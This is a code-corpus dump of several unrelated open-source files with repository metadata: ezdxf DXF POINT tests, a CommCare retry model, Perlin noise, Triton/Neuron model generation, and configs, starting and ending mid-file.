POINT
5
0
8
0
10
1.0
20
2.0
30
3.0
"""
ENTITY_R2000 = """0
POINT
5
0
330
0
100
AcDbEntity
8
0
100
AcDbPoint
10
1.0
20
2.0
30
3.0
"""
@pytest.fixture(params=[ENTITY_R12, ENTITY_R2000])
def entity(request):
return TEST_CLASS.from_text(request.param)
def test_registered():
from ezdxf.entities.factory import ENTITY_CLASSES
assert TEST_TYPE in ENTITY_CLASSES
def test_default_init():
entity = TEST_CLASS()
assert entity.dxftype() == TEST_TYPE
def test_default_new():
entity = TEST_CLASS.new(
handle="ABBA",
owner="0",
dxfattribs={
"color": "7",
"location": (1, 2, 3),
},
)
assert entity.dxf.layer == "0"
assert entity.dxf.color == 7
assert entity.dxf.linetype == "BYLAYER"
assert entity.dxf.location == (1, 2, 3)
assert entity.dxf.location.x == 1, "is not Vec3 compatible"
assert entity.dxf.location.y == 2, "is not Vec3 compatible"
assert entity.dxf.location.z == 3, "is not Vec3 compatible"
# can set DXF R2007 value
entity.dxf.shadow_mode = 1
assert entity.dxf.shadow_mode == 1
assert entity.dxf.extrusion == (0.0, 0.0, 1.0)
assert entity.dxf.hasattr("extrusion") is False, "just the default value"
def test_load_from_text(entity):
assert entity.dxf.layer == "0"
assert entity.dxf.color == 256, "default color is 256 (by layer)"
assert entity.dxf.location.isclose((1, 2, 3))
MALFORMED_POINT = """0
POINT
5
0
330
0
62
7
8
MALFORMED
102
{MOZMAN
8
APP_DATA_LAYER_IGNORED
6
APP_DATA_LTYPE_IGNORED
62
0
102
}
100
AcDbEntity
10
1.0
20
2.0
30
3.0
100
AcDbPoint
6
DOTTED
100
AcDbInvalidSubclassMarker
"""
def test_load_malformed_entity():
"""Missing AcDbPoint subclass marker."""
entity = TEST_CLASS.from_text(MALFORMED_POINT)
assert entity.dxf.layer == "MALFORMED"
assert entity.dxf.color == 7
assert entity.dxf.linetype == "DOTTED"
assert entity.dxf.location.isclose((1, 2, 3))
@pytest.mark.parametrize(
"txt,ver", [(ENTITY_R2000, DXF2000), (ENTITY_R12, DXF12)]
)
def test_write_dxf(txt, ver):
expected = basic_tags_from_text(txt)
point = TEST_CLASS.from_text(txt)
collector = TagCollector(dxfversion=ver, optional=True)
point.export_dxf(collector)
assert collector.tags == expected
collector2 = TagCollector(dxfversion=ver, optional=False)
point.export_dxf(collector2)
assert collector.has_all_tags(collector2)
def test_transform():
point = Point.new(
dxfattribs={
"location": (2, 3, 4),
"extrusion": (0, 1, 0),
"thickness": 2,
}
)
# 1. rotation - 2. scaling - 3. translation
m = Matrix44.chain(Matrix44.scale(2, 3, 1), Matrix44.translate(1, 1, 1))
point.transform(m)
assert point.dxf.location == (5, 10, 5)
assert point.dxf.extrusion == (0, 1, 0)
assert point.dxf.thickness == 6
angle = math.pi / 4
point.transform(Matrix44.z_rotate(math.pi / 4))
assert point.dxf.extrusion.isclose((-math.cos(angle), math.sin(angle), 0))
assert math.isclose(point.dxf.thickness, 6)
def test_fast_translation():
point = Point.new(
dxfattribs={
"location": (2, 3, 4),
"extrusion": (0, 1, 0),
"thickness": 2,
}
)
point.translate(1, 2, 3)
assert point.dxf.location == (3, 5, 7)
def test_do_not_explode_point_entity():
point = Point()
with pytest.raises(TypeError):
explode_entity(point)
def test_virtual_sub_entities():
point = Point()
entities = list(point.virtual_entities())
assert len(entities) == 1
e = entities[0]
assert e.is_copy is True
assert e.source_of_copy is point
|
69c8448bd52742ef819749b869f94da9ff58340f
|
578db86c51d44ebddd0dc7b1738985b3dc69eb74
|
/corehq/ex-submodules/pillow_retry/models.py
|
b687c8dcd361401cc844143eda4a453964d9789f
|
[
"BSD-3-Clause"
] |
permissive
|
dimagi/commcare-hq
|
a43c7dd32b5f89c89fd5aa1b1359ab7301f4ff6b
|
e7391ddae1af1dbf118211ecb52c83fc508aa656
|
refs/heads/master
| 2023-08-16T22:38:27.853437
| 2023-08-16T19:07:19
| 2023-08-16T19:07:19
| 247,278
| 499
| 203
|
BSD-3-Clause
| 2023-09-14T19:03:24
| 2009-07-09T17:00:07
|
Python
|
UTF-8
|
Python
| false
| false
| 5,865
|
py
|
models.py
|
import json
import traceback
from datetime import datetime, timedelta
from dateutil.parser import parse
from django.conf import settings
import math
from django.db import models
from django.db.models.aggregates import Count
from jsonfield.fields import JSONField
from pillow_retry import const
from pillowtop.feed.couch import change_from_couch_row
from pillowtop.feed.interface import ChangeMeta
ERROR_MESSAGE_LENGTH = 512
def _get_extra_args(limit, reduce, skip):
extra_args = dict()
if not reduce and limit is not None:
extra_args.update(
limit=limit,
skip=skip
)
return extra_args
def path_from_object(obj):
path = "{0}.{1}".format(obj.__class__.__module__, obj.__class__.__name__)
return path
class PillowError(models.Model):
id = models.BigAutoField(primary_key=True)
doc_id = models.CharField(max_length=255, null=False)
pillow = models.CharField(max_length=255, null=False, db_index=True)
date_created = models.DateTimeField()
date_last_attempt = models.DateTimeField()
date_next_attempt = models.DateTimeField(db_index=True, null=True)
total_attempts = models.IntegerField(default=0)
current_attempt = models.IntegerField(default=0, db_index=True)
error_type = models.CharField(max_length=255, null=True, db_index=True)
error_traceback = models.TextField(null=True)
change = JSONField(null=True)
change_metadata = JSONField(null=True)
@property
def change_object(self):
change = change_from_couch_row(self.change if self.change else {'id': self.doc_id})
if self.change_metadata:
change.metadata = ChangeMeta.wrap(self.change_metadata)
change.document = None
return change
class Meta(object):
app_label = 'pillow_retry'
unique_together = ('doc_id', 'pillow',)
def add_attempt(self, exception, traceb, change_meta=None, date=None):
new_attempts = change_meta.attempts if change_meta else 1
self.current_attempt += new_attempts
self.total_attempts += new_attempts
self.date_last_attempt = date or datetime.utcnow()
self.error_type = path_from_object(exception)
self.error_traceback = "{}\n\n{}".format(exception, "".join(traceback.format_tb(traceb)))
if self.current_attempt <= const.PILLOW_RETRY_QUEUE_MAX_PROCESSING_ATTEMPTS:
time_till_next = const.PILLOW_RETRY_REPROCESS_INTERVAL * math.pow(self.current_attempt, 2)
self.date_next_attempt = self.date_last_attempt + timedelta(minutes=time_till_next)
else:
self.date_next_attempt = None
def reset_attempts(self):
self.current_attempt = 0
self.date_next_attempt = datetime.utcnow()
def has_next_attempt(self):
return self.current_attempt == 0 or (
self.total_attempts <= const.PILLOW_RETRY_MULTI_ATTEMPTS_CUTOFF and
self.current_attempt <= const.PILLOW_RETRY_QUEUE_MAX_PROCESSING_ATTEMPTS
)
@classmethod
def get_or_create(cls, change, pillow):
change.document = None
doc_id = change.id
try:
error = cls.objects.get(doc_id=doc_id, pillow=pillow.pillow_id)
except cls.DoesNotExist:
now = datetime.utcnow()
error = PillowError(
doc_id=doc_id,
pillow=pillow.pillow_id,
date_created=now,
date_last_attempt=now,
date_next_attempt=now,
change=change.to_dict()
)
if change.metadata:
error.date_created = change.metadata.original_publication_datetime
error.change_metadata = change.metadata.to_json()
return error
@classmethod
def get_errors_to_process(cls, utcnow, limit=None, skip=0):
"""
Get errors according the following rules:
date_next_attempt <= utcnow
AND
(
total_attempts <= multi_attempt_cutoff & current_attempt <= max_attempts
OR
total_attempts > multi_attempt_cutoff & current_attempt 0
)
where:
* multi_attempt_cutoff = const.PILLOW_RETRY_QUEUE_MAX_PROCESSING_ATTEMPTS * 3
* max_attempts = const.PILLOW_RETRY_QUEUE_MAX_PROCESSING_ATTEMPTS
:param utcnow: The current date and time in UTC.
:param limit: Paging limit param.
:param skip: Paging skip param.
"""
max_attempts = const.PILLOW_RETRY_QUEUE_MAX_PROCESSING_ATTEMPTS
multi_attempts_cutoff = const.PILLOW_RETRY_MULTI_ATTEMPTS_CUTOFF
query = PillowError.objects \
.filter(date_next_attempt__lte=utcnow) \
.filter(
models.Q(current_attempt=0) |
(models.Q(total_attempts__lte=multi_attempts_cutoff) & models.Q(current_attempt__lte=max_attempts))
)
# temporarily disable queuing of ConfigurableReportKafkaPillow errors
query = query.filter(~models.Q(pillow='corehq.apps.userreports.pillow.ConfigurableReportKafkaPillow'))
if limit is not None:
return query[skip:skip+limit]
else:
return query
@classmethod
def bulk_reset_attempts(cls, last_attempt_lt, attempts_gte=None):
if attempts_gte is None:
attempts_gte = const.PILLOW_RETRY_QUEUE_MAX_PROCESSING_ATTEMPTS
multi_attempts_cutoff = const.PILLOW_RETRY_MULTI_ATTEMPTS_CUTOFF
return PillowError.objects.filter(
models.Q(date_last_attempt__lt=last_attempt_lt),
models.Q(current_attempt__gte=attempts_gte) | models.Q(total_attempts__gte=multi_attempts_cutoff)
).update(
current_attempt=0,
date_next_attempt=datetime.utcnow()
)
|
aacfa3598f163bb4bf3768336baad5dfcb6237ee
|
13800b7827598e76428a335559b7bf11867ec2f0
|
/python/ccxt/test/sync/test_fetch_transaction_fees.py
|
6127211e847fe08b709c132ef08a375672552f13
|
[
"MIT"
] |
permissive
|
ccxt/ccxt
|
b40a0466f5c430a3c0c6026552ae697aa80ba6c6
|
e4065f6a490e6fc4dd7a72b375428b2faa570668
|
refs/heads/master
| 2023-09-04T03:41:29.787733
| 2023-09-03T19:25:57
| 2023-09-03T19:25:57
| 91,253,698
| 30,798
| 8,190
|
MIT
| 2023-09-14T21:59:09
| 2017-05-14T15:41:56
|
Python
|
UTF-8
|
Python
| false
| false
| 760
|
py
|
test_fetch_transaction_fees.py
|
import os
import sys
root = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))
sys.path.append(root)
# ----------------------------------------------------------------------------
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
# ----------------------------------------------------------------------------
# -*- coding: utf-8 -*-
def test_fetch_transaction_fees(exchange, skipped_properties):
# const method = 'fetchTransactionFees';
# const fees = await exchange.fetchTransactionFees ();
# const withdrawKeys = Object.keys (fees['withdraw']);
# todo : assert each entry
return None
|
3ed1b3b2c26c7323326cb4952513ff6308eeb7ba
|
b4faab9b904d155ce6e781a675f972dcb810c008
|
/nunif/utils/perlin2d.py
|
9e1365720246667fca2d446fc445de877667a75f
|
[
"MIT",
"CC-BY-NC-4.0",
"Apache-2.0"
] |
permissive
|
nagadomi/nunif
|
0c595d3e61f3c89082ce7481cfba139b85ac863d
|
6d4b92da09801572e984b05f6733d460b60250aa
|
refs/heads/master
| 2023-08-31T21:29:56.460275
| 2023-08-21T18:16:01
| 2023-08-21T18:16:01
| 202,088,108
| 486
| 59
|
MIT
| 2023-08-04T05:51:17
| 2019-08-13T07:23:32
|
Python
|
UTF-8
|
Python
| false
| false
| 1,811
|
py
|
perlin2d.py
|
# Original work is perlin-numpy: https://github.com/pvigier/perlin-numpy)
# Pierre Vigier / MIT License
# Vadim Kantorov ported to pytorch: https://gist.github.com/vadimkantorov/ac1b097753f217c5c11bc2ff396e0a57
# some minor changes by nagdaomi
import torch
import math
def generate_perlin_noise_2d(shape, res, fade=lambda t: 6 * t**5 - 15 * t**4 + 10 * t**3):
delta = (res[0] / shape[0], res[1] / shape[1])
d = (shape[0] // res[0], shape[1] // res[1])
grid = torch.stack(torch.meshgrid(
torch.arange(0, res[0], delta[0]),
torch.arange(0, res[1], delta[1]), indexing="ij"), dim=-1) % 1
angles = 2. * math.pi * torch.rand(res[0] + 1, res[1] + 1)
gradients = torch.stack((torch.cos(angles), torch.sin(angles)), dim=-1)
tile_grads = lambda slice1, slice2: gradients[slice1[0]:slice1[1], slice2[0]:slice2[1]].repeat_interleave(d[0], 0).repeat_interleave(d[1], 1)
dot = lambda grad, shift: (torch.stack((grid[:shape[0], :shape[1], 0] + shift[0], grid[:shape[0], :shape[1], 1] + shift[1]), dim=-1) * grad[:shape[0], :shape[1]]).sum(dim=-1)
n00 = dot(tile_grads([0, -1], [0, -1]), [0, 0])
n10 = dot(tile_grads([1, None], [0, -1]), [-1, 0])
n01 = dot(tile_grads([0, -1], [1, None]), [0, -1])
n11 = dot(tile_grads([1, None], [1, None]), [-1, -1])
t = fade(grid[:shape[0], :shape[1]])
return math.sqrt(2) * torch.lerp(torch.lerp(n00, n10, t[..., 0]), torch.lerp(n01, n11, t[..., 0]), t[..., 1])
def generate_perlin_noise_2d_octaves(shape, res, octaves=1, persistence=0.5):
noise = torch.zeros(shape)
frequency = 1
amplitude = 1
for _ in range(octaves):
noise += amplitude * generate_perlin_noise_2d(shape, (frequency * res[0], frequency * res[1]))
frequency *= 2
amplitude *= persistence
return noise
|
57e8c1c4af3452b2afc996905a89b9d4b9c603c7
|
2212a32833776a5d5d2164d8efd11bd18bd3f768
|
/tf_agents/train/utils/train_utils.py
|
670e079042a6e94250b57d5470a858bb8fe8d170
|
[
"Apache-2.0"
] |
permissive
|
tensorflow/agents
|
f39805fb98ef9af712dcaff3ba49e1ac6d42804b
|
eca1093d3a047e538f17f6ab92ab4d8144284f23
|
refs/heads/master
| 2023-08-14T04:56:30.774797
| 2023-08-02T17:43:44
| 2023-08-02T17:44:09
| 157,936,206
| 2,755
| 848
|
Apache-2.0
| 2023-07-26T02:35:32
| 2018-11-17T00:29:12
|
Python
|
UTF-8
|
Python
| false
| false
| 8,651
|
py
|
train_utils.py
|
# coding=utf-8
# Copyright 2020 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utils for distributed training using Actor/Learner API."""
import os
import time
from typing import Callable, Text, Tuple
from absl import logging
import tensorflow.compat.v2 as tf
from tf_agents.agents import tf_agent
from tf_agents.policies import py_tf_eager_policy
from tf_agents.typing import types
from tf_agents.utils import lazy_loader
# Lazy loading since not all users have the reverb package installed.
reverb = lazy_loader.LazyLoader('reverb', globals(), 'reverb')
# By default the implementation of wait functions blocks with relatively large
# number of frequent retries assuming that the event usually happens soon, but
# occasionally takes longer.
_WAIT_DEFAULT_SLEEP_TIME_SECS = 1
_WAIT_DEFAULT_NUM_RETRIES = 60 * 60 * 24 # 1 day
def create_train_step() -> tf.Variable:
return tf.Variable(
0,
trainable=False,
dtype=tf.int64,
aggregation=tf.VariableAggregation.ONLY_FIRST_REPLICA,
shape=(),
)
def create_staleness_metrics_after_train_step_fn(
train_step: tf.Variable, train_steps_per_policy_update: int = 1
) -> Callable[
[Tuple[types.NestedTensor, types.ReverbSampleInfo], tf_agent.LossInfo], None
]:
"""Creates an `after_train_step_fn` that computes staleness summaries.
Staleness, in this context, means that the observation was generated by a
policy that is older than the recently outputed policy.
Assume that observation train step is stored as Reverb priorities.
Args:
train_step: The current train step.
train_steps_per_policy_update: Number of train iterations to perform between
two policy updates.
Returns:
The created `after_train_step_fn`.
"""
def after_train_step_fn(experience, loss_info):
del loss_info # Unused.
_, sample_info = experience
# Get the train step in which the experience was observed. This is stored as
# Reverb priority.
# TODO(b/168426331): Check sample info version.
observation_generation_train_step = tf.cast(
sample_info.priority, dtype=tf.int64
)
# Get the train step corresponding to the latest outputed policy.
# Policy is written in every `train_steps_per_policy_update` step, so we
# normalize the value of `train_step` accordingly.
on_policy_train_step = (
tf.cast(train_step / train_steps_per_policy_update, dtype=tf.int64)
* train_steps_per_policy_update
)
# An observation is off-policy if its train step delta is greater than 0.
observation_train_step_delta = (
on_policy_train_step - observation_generation_train_step
)
max_train_step_delta = tf.reduce_max(observation_train_step_delta)
max_policy_update_delta = tf.cast(
max_train_step_delta / train_steps_per_policy_update, dtype=tf.int64
)
num_stale_observations = tf.reduce_sum(
tf.cast(observation_train_step_delta > 0, tf.int64)
)
# Break out from local name scopes (e.g. the ones intrdouced by while loop).
with tf.name_scope(''):
# Write the summaries for the first replica.
tf.summary.scalar(
name='staleness/max_train_step_delta_in_batch',
data=max_train_step_delta,
step=train_step,
)
tf.summary.scalar(
name='staleness/max_policy_update_delta_in_batch',
data=max_policy_update_delta,
step=train_step,
)
tf.summary.scalar(
name='staleness/num_stale_obserations_in_batch',
data=num_stale_observations,
step=train_step,
)
return after_train_step_fn
def wait_for_policy(
policy_dir: Text,
sleep_time_secs: int = _WAIT_DEFAULT_SLEEP_TIME_SECS,
num_retries: int = _WAIT_DEFAULT_NUM_RETRIES,
**saved_model_policy_args
) -> py_tf_eager_policy.PyTFEagerPolicyBase:
"""Blocks until the policy in `policy_dir` becomes available.
The default setting allows a fairly loose, but not infinite wait time of one
days for this function to block checking the `policy_dir` in every seconds.
Args:
policy_dir: The directory containing the policy files.
sleep_time_secs: Number of time in seconds slept between retries.
num_retries: Number of times the existence of the file is checked.
**saved_model_policy_args: Additional keyword arguments passed directly to
the `SavedModelPyTFEagerPolicy` policy constructor which loads the policy
from `policy_dir` once the policy becomes available.
Returns:
The policy loaded from the `policy_dir`.
Raises:
TimeoutError: If the policy does not become available during the number of
retries.
"""
# TODO(b/173815037): Write and wait for a DONE file instead.
last_written_policy_file = os.path.join(policy_dir, 'policy_specs.pbtxt')
wait_for_file(
last_written_policy_file,
sleep_time_secs=sleep_time_secs,
num_retries=num_retries,
)
return py_tf_eager_policy.SavedModelPyTFEagerPolicy(
policy_dir, **saved_model_policy_args
)
# TODO(b/142821173): Test train_utils `wait_for_files` function.
def wait_for_file(
file_path: Text,
sleep_time_secs: int = _WAIT_DEFAULT_SLEEP_TIME_SECS,
num_retries: int = _WAIT_DEFAULT_NUM_RETRIES,
) -> Text:
"""Blocks until the file at `file_path` becomes available.
The default setting allows a fairly loose, but not infinite wait time of one
days for this function to block checking the `file_path` in every seconds.
Args:
file_path: The path to the file that we are waiting for.
sleep_time_secs: Number of time in seconds slept between retries.
num_retries: Number of times the existence of the file is checked.
Returns:
The original `file_path`.
Raises:
TimeoutError: If the file does not become available during the number of
trials.
"""
def _is_file_missing(file_path=file_path):
"""Checks if the file is (still) missing, i.e. more wait is necessary."""
try:
stat = tf.io.gfile.stat(file_path)
except tf.errors.NotFoundError:
return True
found_file = stat.length <= 0
logging.info(
'Checking for file %s (%s)',
file_path,
'found' if found_file else 'not found',
)
return found_file
wait_for_predicate(
wait_predicate_fn=_is_file_missing,
sleep_time_secs=sleep_time_secs,
num_retries=num_retries,
)
return file_path
# TODO(b/142821173): Test train_utils `wait_for_predicate` function.
def wait_for_predicate(
wait_predicate_fn: Callable[[], bool],
sleep_time_secs: int = _WAIT_DEFAULT_SLEEP_TIME_SECS,
num_retries: int = _WAIT_DEFAULT_NUM_RETRIES,
) -> None:
"""Blocks while `wait_predicate_fn` is returning `True`.
The callable `wait_predicate_fn` indicates if waiting is still needed by
returning `True`. Once the condition that we wanted to wait for met, the
callable should return `False` denoting that the execution can continue.
The default setting allows a fairly loose, but not infinite wait time of one
days for this function to block checking the `wait_predicate_fn` in every
seconds.
Args:
wait_predicate_fn: A callable returning a bool. Blocks while it is returning
`True`. Returns if it becomes `False`.
sleep_time_secs: Number of time in seconds slept between retries.
num_retries: Number of times the existence of the file is checked.
Raises:
TimeoutError: If the `wait_predicate_fn` does not become `False` during the
number of trials.
"""
retry = 0
while (num_retries is None or retry < num_retries) and wait_predicate_fn():
if sleep_time_secs > 0:
logging.info(
'Waiting for `wait_predicate_fn`. Block execution. Sleeping for %d '
'seconds.',
sleep_time_secs,
)
time.sleep(sleep_time_secs)
retry += 1
if retry >= num_retries:
raise TimeoutError(
'The wait predicate did not return `False` after {} retries waiting {} '
'seconds between retries.'.format(num_retries, sleep_time_secs)
)
logging.info('The `wait_predicate_fn` returned `False`. Continue execution.')
|
5bb2156ca157e4885b6c4718e30830356ddc7c3a
|
d1f15554df2d5c0f74ddbcba6e870359841f682b
|
/wagtail/contrib/routable_page/apps.py
|
321065f7c1d9e167771966ac240658263ee82fd8
|
[
"BSD-3-Clause",
"LicenseRef-scancode-proprietary-license"
] |
permissive
|
wagtail/wagtail
|
bd405f89b86e0c625fef0685fd6bfba41cf5cbfc
|
06a7bc6124bf62675c09fbe0a4ed9bbac183e025
|
refs/heads/main
| 2023-09-04T06:22:51.601208
| 2023-09-01T15:22:00
| 2023-09-01T15:22:00
| 16,479,108
| 12,974
| 3,580
|
BSD-3-Clause
| 2023-09-14T10:45:04
| 2014-02-03T12:41:59
|
Python
|
UTF-8
|
Python
| false
| false
| 260
|
py
|
apps.py
|
from django.apps import AppConfig
from django.utils.translation import gettext_lazy as _
class WagtailRoutablePageAppConfig(AppConfig):
name = "wagtail.contrib.routable_page"
label = "wagtailroutablepage"
verbose_name = _("Wagtail routablepage")
|
16d1c6bd5d0ac8db2907b10d6f9694211eca880d
|
ee6c94d093dc38e9852f5d9f27fa3fa062333a67
|
/main/_base_/filters/savizky_golay.py
|
40302b004460699dfe8522c59c9a3e8cf1c35d83
|
[
"MIT"
] |
permissive
|
IDEA-Research/OSX
|
5946f9b6d8cb4f53d16b937b1d30e0dac8975983
|
13df1cbf9cc5ae72deb46ce7ab5832e7bcb8bd9d
|
refs/heads/main
| 2023-08-09T04:49:49.195387
| 2023-07-30T14:34:16
| 2023-07-30T14:34:16
| 620,198,494
| 371
| 36
|
MIT
| 2023-04-27T14:02:07
| 2023-03-28T08:08:43
|
Python
|
UTF-8
|
Python
| false
| false
| 89
|
py
|
savizky_golay.py
|
filter_cfg = dict(
type='SavizkyGolayFilter',
window_size=11,
polyorder=2,
)
|
ef3136b94afb2bb17719b42451f5cd00ab7efb9e
|
9803232b04daa00eb4038be338b833907fd1625f
|
/library/utils/fgd_parser/__init__.py
|
b4c005f2d13c5d5f39d7b151a7f6df97499668a4
|
[
"MIT"
] |
permissive
|
REDxEYE/SourceIO
|
a0ff3cff37504afdb906e4ee20c1077a8daf2912
|
85661fe057cef1ad2a779a9d48e810ea214f4f07
|
refs/heads/master
| 2023-08-08T18:35:28.771447
| 2023-08-07T22:26:59
| 2023-08-07T22:26:59
| 170,197,673
| 409
| 53
|
MIT
| 2023-08-23T18:40:38
| 2019-02-11T20:33:55
|
Python
|
UTF-8
|
Python
| false
| false
| 34
|
py
|
__init__.py
|
from .fgd_parser import FGDParser
|
2177c971ceb6b699c8c1acf57e04135d81338014
|
2bbc2628e5b4aaf1e67e04b5485ffc621e088a4d
|
/qa/common/inferentia_perf_analyzer_input_data_json/simple_model.py
|
db7ca95848c0e8467f60f571688869344e401964
|
[
"BSD-3-Clause"
] |
permissive
|
triton-inference-server/server
|
9dbce65aba73ef36a0d2399ed9d63eccb9f84e52
|
0f478f32fe74f591400c3a073e253f7dae8a383e
|
refs/heads/main
| 2023-08-16T16:46:50.059935
| 2023-08-15T22:58:44
| 2023-08-15T22:58:44
| 151,636,194
| 4,711
| 1,085
|
BSD-3-Clause
| 2023-09-14T11:14:08
| 2018-10-04T21:10:30
|
Python
|
UTF-8
|
Python
| false
| false
| 5,032
|
py
|
simple_model.py
|
#!/usr/bin/env python
# Copyright 2021-2023, NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of NVIDIA CORPORATION nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import argparse
def gen_pytorch_model(name, batch_size):
class PyAddSubNet(nn.Module):
"""
Simple AddSub network in PyTorch. This network outputs the sum and
subtraction of the inputs.
"""
def __init__(self):
super(PyAddSubNet, self).__init__()
def forward(self, input0, input1):
return torch.sub(input0, input1, alpha=-1), torch.sub(
input0, input1, alpha=1
)
model = PyAddSubNet()
model.eval()
batch_size = 1
example_inputs = torch.zeros([8, 4], dtype=torch.int64), torch.zeros(
[8, 4], dtype=torch.int64
)
model_neuron = torch_neuron.trace(model, example_inputs, dynamic_batch_size=True)
model_neuron.save("{}.pt".format(name))
def gen_tf_model(name, batch_size, tf_version):
# Set up model directory
model_dir = "add_sub_model"
compiled_model_dir = name
shutil.rmtree(model_dir, ignore_errors=True)
shutil.rmtree(compiled_model_dir, ignore_errors=True)
if tf_version == 1:
with tf.Session() as sess:
# Export SavedModel
input0 = tf.placeholder(tf.int64, [None, 4], "INPUT__0")
input1 = tf.placeholder(tf.int64, [None, 4], "INPUT__1")
output0 = tf.add(input0, input1, "OUTPUT__0")
output1 = tf.subtract(input0, input1, "OUTPUT__1")
tf.compat.v1.saved_model.simple_save(
session=sess,
export_dir=model_dir,
inputs={"INPUT__0": input0, "INPUT__1": input1},
outputs={"OUTPUT__0": output0, "OUTPUT__1": output1},
)
# Compile using Neuron
tfn.saved_model.compile(
model_dir,
compiled_model_dir,
batch_size=batch_size,
dynamic_batch_size=True,
)
elif tf_version == 2:
# TODO: Add gen scripts for TF2
raise Exception("TensorFlow2 not yet supported")
else:
raise Exception("Unrecognized Tensorflow version: {}".format(tf_version))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--model_type",
type=str,
required=True,
choices=["pytorch", "tensorflow"],
help="""The type of the compiled model. Currently,
only supports \"pytorch\" and \"tensorflow\".""",
)
parser.add_argument(
"--name", type=str, required=True, help="The name of the compiled model"
)
parser.add_argument(
"--tf_version",
type=int,
choices=[1, 2],
help="Version of tensorflow for compiled model",
)
parser.add_argument(
"--batch_size",
type=int,
default=1,
help="The batch size for the compiled model",
)
FLAGS, unparsed = parser.parse_known_args()
if len(unparsed) > 0:
raise Exception("Unrecognized options: {}".format(unparsed))
if FLAGS.model_type == "tensorflow":
import shutil
import tensorflow as tf
import tensorflow.neuron as tfn
gen_tf_model(FLAGS.name, FLAGS.batch_size, FLAGS.tf_version)
elif FLAGS.model_type == "pytorch":
import torch
import torch_neuron
from torch import nn
gen_pytorch_model(FLAGS.name, FLAGS.batch_size)
|
0223c9c3296dea9e0548ad7e3385b57ee4d7f67d
|
e73547787354afd9b717ea57fe8dd0695d161821
|
/tools/splat/util/palettes.py
|
8ee1e9a014238a1036625f8e3ef93e74e71fac57
|
[
"MIT"
] |
permissive
|
pmret/papermario
|
8b514b19653cef8d6145e47499b3636b8c474a37
|
9774b26d93f1045dd2a67e502b6efc9599fb6c31
|
refs/heads/main
| 2023-08-31T07:09:48.951514
| 2023-08-21T18:07:08
| 2023-08-21T18:07:08
| 287,151,133
| 904
| 139
| null | 2023-09-14T02:44:23
| 2020-08-13T01:22:57
|
C
|
UTF-8
|
Python
| false
| false
| 1,155
|
py
|
palettes.py
|
from typing import Dict
from segtypes.common.group import CommonSegGroup
from segtypes.n64.ci import N64SegCi
from segtypes.n64.palette import N64SegPalette as Palette
# Resolve Raster#palette and Palette#raster links
def initialize(all_segments):
def process(segments):
raster_map: Dict[str, N64SegCi] = {}
palette_map: Dict[str, Palette] = {}
for segment in segments:
if isinstance(segment, Palette):
palette_map[segment.name] = segment
if isinstance(segment, N64SegCi):
raster_map[segment.name] = segment
if isinstance(segment, CommonSegGroup):
process(segment.subsegments)
for raster_name in raster_map:
raster = raster_map[raster_name]
# print(f"{raster_name} -> {raster.palette_name}")
raster.palette = palette_map.get(raster.palette_name)
for palette_name in palette_map:
palette = palette_map[palette_name]
# print(f"{palette_name} -> {palette.raster_name}")
palette.raster = raster_map.get(palette.raster_name)
process(all_segments)
|
f8de77a7e58e9ba02ae8b71884e66c3e31d4adf9
|
a5a99f646e371b45974a6fb6ccc06b0a674818f2
|
/CondCore/DBOutputService/test/python/testLumiBasedUpdateAnalyzer_cfg.py
|
712e988c657e418bba7a0d1b7a574d58dc10137b
|
[
"Apache-2.0"
] |
permissive
|
cms-sw/cmssw
|
4ecd2c1105d59c66d385551230542c6615b9ab58
|
19c178740257eb48367778593da55dcad08b7a4f
|
refs/heads/master
| 2023-08-23T21:57:42.491143
| 2023-08-22T20:22:40
| 2023-08-22T20:22:40
| 10,969,551
| 1,006
| 3,696
|
Apache-2.0
| 2023-09-14T19:14:28
| 2013-06-26T14:09:07
|
C++
|
UTF-8
|
Python
| false
| false
| 1,747
|
py
|
testLumiBasedUpdateAnalyzer_cfg.py
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("TEST")
process.source = cms.Source("EmptySource",
firstRun = cms.untracked.uint32( 260000 ),
firstLuminosityBlock = cms.untracked.uint32( 1 ),
numberEventsInRun = cms.untracked.uint32( 30 ),
numberEventsInLuminosityBlock = cms.untracked.uint32(3),
)
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(30))
process.MessageLogger = cms.Service("MessageLogger",
cerr = cms.untracked.PSet(
enable = cms.untracked.bool(False)
),
cout = cms.untracked.PSet(
enable = cms.untracked.bool(True),
